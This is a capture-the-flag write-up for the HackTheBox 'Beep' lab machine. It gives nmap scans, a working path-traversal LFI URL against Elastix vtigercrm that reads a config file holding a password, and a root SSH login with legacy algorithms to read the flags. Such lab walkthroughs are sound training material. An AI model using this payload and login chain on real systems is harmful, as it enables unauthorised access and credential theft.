HackTheBox Beep Writeup
Explore the fundamentals of cybersecurity in the Beep Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
10.10.10.7 beep.htb
Script to add hosts automatically
1
2
3
ip="10.10.10.7"
domain="beep.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
1
nmap -sV -sC -F --version-light 10.10.10.7
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.070s latency).
Not shown: 89 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://beep.htb/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES EXPIRE(NEVER) TOP UIDL USER AUTH-RESP-CODE PIPELINING STLS APOP
111/tcp open rpcbind
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID THREAD=REFERENCES ACL Completed QUOTA UNSELECT OK URLAUTHA0001 CHILDREN ANNOTATEMORE LITERAL+ NAMESPACE LIST-SUBSCRIBED RENAME LISTEXT NO STARTTLS ATOMIC IDLE RIGHTS=kxte CONDSTORE CATENATE SORT=MODSEQ IMAP4rev1 IMAP4 THREAD=ORDEREDSUBJECT MAILBOX-REFERRALS BINARY MULTIAPPEND SORT X-NETSCAPE UIDPLUS
443/tcp open ssl/https?
|_ssl-date: 2024-10-20T12:18:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Accessing Beep HTB via Deprecated SSL
Note: The TLS version on Beep HTB is outdated (TLS 1.0), so it won’t open in modern browsers by default.
To enable access in Firefox:
- Go to
about:config. - Set the following:
1
security.tls.version.enable-deprecated = true
Now, you can access https://beep.htb/.
Searching for Vulnerabilities in Elastix
To begin, search for vulnerabilities related to Elastix using searchsploit:
1
searchsploit elastix
CVE-2012-4869 - Local File Inclusion (LFI)
There is a known Local File Inclusion (LFI) vulnerability in Elastix that can be exploited via the vtigercrm component.
Exploit Reference:
Exploit-DB #37637
LFI URL:
1
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
View the source of the page to get the content formatted properly. This exploit can reveal sensitive information, such as the string jEhdIekWmdjE.
Exploiting Further via SSH
After revealing sensitive information through the LFI exploit, you can attempt to connect to the machine via SSH. However, since the system is old and uses deprecated security settings, the connection might not work with modern distributions like Arch Linux, which have stricter default algorithms.
To proceed, first scan the supported SSH algorithms on the target machine:
1
nmap -p22 -sV --script ssh2-enum-algos 10.10.10.7
If older algorithms are required, use the following SSH options to specify deprecated algorithms:
1
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa root@10.10.10.7
Once connected, retrieve the flags:
1
2
cat /home/fanis/user.txt
cat /root/root.txt